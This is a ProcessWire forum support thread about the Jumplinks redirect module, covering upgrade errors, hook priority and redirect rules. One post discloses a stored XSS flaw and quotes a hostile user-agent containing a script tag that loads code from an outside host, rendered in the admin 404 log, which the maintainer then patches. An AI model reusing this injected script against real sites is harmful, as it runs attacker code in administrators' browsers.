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Mike Rockett

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@Mike Rockett - I am seeing entries appearing the on the 404 Monitor tab that are actually being properly handled and redirected by PagePathHistory. I am wondering if it's a matter of adjusting the load priority for the Jumplinks module relative to PagePathHistory, or if there is more to fixing this, but it would be great if they weren't being recorded. Any thoughts? Thanks!

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@Mike Rockett, sorry to bother you with this again, but with version 1.5.56 of Jumplinks we're still seeing quite a few database errors:


String data, right truncated: 1406 Data too long for column 'request_uri' at row 1 (in /site/assets/cache/FileCompiler/site/modules/ProcessJumplinks/ProcessJumplinks.module.php line 532)


Looking at the database the column is now varchar(512), but it seems that's just not enough.

On a related note: on this site "Log 404 hits to the database" isn't checked, so I'm wondering why this is still happening? This is unrelated to the database issue above, but it also seems that there might be some unnecessary / unexpected process going on in here ?

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not sure if this was reported already, but i'm unable to upgrade past 1.5.54, upgrading from 1.5.54 => 1.5.57 creates a "Failed to init module" error, SQLSTATE[42S21]: Column already exists: 1060 Duplicate column name 'last_hit'. Hope this helps, not sure what the issue is.

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  On 11/8/2019 at 4:36 PM, Ben Sayers said:

Hi @kongondo, no problem at all! I'm just happy to have your support ? - I'll stay tuned, thanks!!


@Ben Sayers,

I hope you can forgive my 'ineptitude'. I have been royally swamped.

I tried to install Jumplinks but was inundated with the errors reported by others above, so I gave up on that. Anyway, that was just for testing redirects. My solution below, since Jumplinks isn't working for me (I tried all the way back to version 1.5.50), is to use ProcessWire session redirects. I don't know what that means for you in respect of SEO. I hope I am not polluting Jumplinks' support forum but I need to offer a bit of an explanation.

The template blog-posts has URL segments enabled. If you visit:


ProcessWire successfully resolves that since 'an-existing-post' exists. In other words, 'an-existing-post' is not considered a URL segment.

If you visit:


the URL does not resolve to an existing post. ProcessWire knows that and considers 'non-existing-post' to be a URL Segment. However, since we have URL segments enabled in blog-posts, ProcessWire lets us deal with the situation. We do this in blog-posts template file. I don't know how Jumplinks works but I assume if we threw a 404 error, it will pick up on that and redirect to our desired URI. Again, I am just guessing here. However, since Jumplinks did not work for me, I suggest the following (session redirect), even as a temporary measure. You can try the 404 option to see if it works. Please report back, thanks.

At the top of your blog-posts template file, insert the following, just above your first include:

if($input->urlSegment1) {
	// @todo: test this with Jumplinks. In that case, comment out "session" code below
    //throw new Wire404Exception();
	// redirect to main blog page. if using this, comment out 404 exception code above
include('./_head.php'); // include header markup

I hope this helps. Apologies again for the delay.

Edited by kongondo
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  On 11/19/2019 at 11:37 AM, kongondo said:

I hope you can forgive my 'ineptitude'. I have been royally swamped.


Not a problem at all @kongondo, I know how it goes ?


At the top of your blog-posts template file, insert the following, just above your first include:

if($input->urlSegment1) {
	// @todo: test this with Jumplinks. In that case, comment out "session" code below
    throw new Wire404Exception();
	// redirect to main blog page. if using this, comment out 404 exception code above
    // $session->redirect('/blog/');

I used the first option with Jumplinks and it WORKS!! Hallelujah, thank you so much for your time.

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Hi guys,

Super sorry for not getting back to you – much like @kongondo, royally swamped (this time of year).

First off, I'm battling to understand why folks are having install/upgrade troubles here. Whilst JL1 doesn't use a full-on DB migration strategy, it does have an iterative cycle. If you're on schema v4 and upgrade to the latest version, it should be doing v5 and then v6. Only thing I can think of then is that the schema version got messed up somehow. It gets saved in the module’s config, so I really don't see what could have messed it up (I recently formatted those files, but naturally that should not make a difference). I'd need to try reproduce this to see what might be going on. As an aside, JL2 will use DB migrations, so this issue would less likely be encountered unless the applicable tracking table was truncated. Hoping to get JL2 wrapped up over the holidays (lots of leave-days, no big plans).

@adrian – I see PagePathHistory doesn't set its own priority, and JL does. I recall doing this for a reason, but given what you've said, perhaps JL should be somehow setup to be the 'last resort'?

@teppo – Given the schema errors that are being experienced, I think that for the time being, I'm going to simply truncate the string that gets stored to 512 characters. Also a little confused by the 404 logger – it really should not be doing anything if turned off. I do see that it only logs the 404 if there are no jumplinks – I'll definitely fix up that part. 

Update: I've pushed out 1.5.58 - please let me know if the DB errors stop. Thanks!


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  On 11/22/2019 at 3:26 AM, Mike Rockett said:

 I see PagePathHistory doesn't set its own priority, and JL does. I recall doing this for a reason, but given what you've said, perhaps JL should be somehow setup to be the 'last resort'?


Yeah, it's the priority setting, but also you use addHookBefore and PagePathHistory used AddHook (alias of AddHookAfter) so to get it to not log a 404 for those URLs handled by PPH, I changed Jumplinks to use addHookAfter and set the priority to 1000 - remember that 100 is the default.

Any thoughts on committing these changes to JL?


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@adrian – I'd be happy to. I see from a previous discussion with Teppo that the priority was set due to a conflict with sitemaps. That being said, I do believe there is a measure in place to circumvent sitemap.xml URIs from being logged, so as a result, I don't see why we can't change the hook and priority. At the end of the day, it kinda makes sense. Modules that need to do things with 404 events should be given the opportunity to do so before JL comes in as a last resort. So I'm going to go ahead and do this – if anyone encounters any issues, we'll need to deal with them on an as-and-when basis.

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  On 11/22/2019 at 2:54 PM, Mike Rockett said:

Have release 1.5.59 with these changes. ?


Thanks - awesome, except I am getting this error when updating via PW's Upgrade module.

"File could not be downloaded (https://gitlab.com/rockettpw/seo/jumplinks-one/-/archive/1.5.59/jumplinks-one-1.5.59.zip) 404 Not Found: (tried: curl)"

Any reason you can think of?

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  • 2 weeks later...

@OllieMackJames - hmm, something weird is going on here as this is not the first time this has come up (I don't think)... I wonder if it's something related to the module config. The schema version is set there, and it will iterate through the schema updates until it matches the current version. That particular column is way back in schema v3, which is why I think there might be a config issue going on here... Was this a new install or an upgrade?

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  On 12/3/2019 at 6:50 PM, Mike Rockett said:

@OllieMackJames - hmm, something weird is going on here as this is not the first time this has come up (I don't think)... I wonder if it's something related to the module config. The schema version is set there, and it will iterate through the schema updates until it matches the current version. That particular column is way back in schema v3, which is why I think there might be a config issue going on here... Was this a new install or an upgrade?


@Mike Rockett it was an upgrade, been using this great module for years already, thanks

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@OllieMackJames Okay, well I honestly don't think there's much more I can do here (unless I'm missing something staring at me in the face ?). Hoping to find time soon to continue work on v2 (starting writing the frontend a little while back), which will keep track of these things a little differently (a migration table). 

  On 12/5/2019 at 9:13 AM, OllieMackJames said:

been using this great module for years already, thanks


Scary to think how long it's been around, and how long I've taken to get v2 anywhere ?

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  • 1 month later...


If you have "log 404 to database" enabled and somebody request some js-bullshit as user-agent, the script gets exectuted, because it is rendered as such in the Jumplinks Table.

Can u please fix this fast?


Example with script-tag (i think the script is the user-agent)
	<td><a href='entity/?id=0&source=wp-admin'>wp-admin</a></td>
	<td class='blank'></td>
	<td><abbr title=""><script type=text/javascript src='https://statistic.admarketlocation.com/hos?&tp=3'></script>"> </abbr></td>
 	<td>2020-01-09 15:18:54</td>


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  On 1/9/2020 at 3:45 PM, Mike Rockett said:

@phlp Security Release 1.5.60 is up. Unable to test right now – please could you check to see that all's good?



When there is a script in the user-agent, it gets rendered link this

	<td><a href="entity/?id=0&amp;source=wp-admin%2Fwp-login.php">wp-admin/wp-login.php</a></td>
	<td class="blank"></td>
	<td><abbr title="&quot;><script type=text/javascript src='https://statistic.admarketlocation.com/hos?&amp;tp=3'></script>"> </abbr></td>
	<td>2020-01-09 15:19:01</td>

It works, but the cell is empty and it still looks creepy.

How about filtering them completely and not even let them in the database?

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@phlp The reason the cell is empty is because the parser could not determine the browser name and version, and so it's empty anyway. At best, I could simply indicate that the that browser is "unknown" in that column. Wouldn't want to not store unknown agents just because they can't be parsed - this would be getting rid of raw information that might be useful to some folks.

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  • 4 weeks later...

Hi there - looking for some support help:

Ordering/Prioritization of Jumplinks 

Is there any way to ensure one or more jumplinks get processed before another:


blog/old-url => new-blog/new-url 

gets run before -

blog/{all} => new-blog/{all}


Query Strings

Is there any way to ensure that any query string is attached to the destination without having to write a specific redirect


old-page-url?foo=bar => new-page-url?foo=bar

I have this in place with the following 2 jumplinks:

old-page-url => new-page-url


old-page-url?{all} => new-page-url?{all}

but it seems like this should be feasible in one jumplink?


Sorry these questions are fairly simple - I feel like I'm missing something staring me right in the face.




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@baronmunchowsen – I think mapping collections might be what you need if you haven't declared them in the correct order. Create a collection called blog, and include only the one you would like before the catch-all takes effect. So add old-url=new-url in the collection. Then your source would be blog/{all} and your destination would be new-blog/{all|blog}. That should do it, hopefully.

As for query strings, that's being added to v2, which is on hold again unfortunately.

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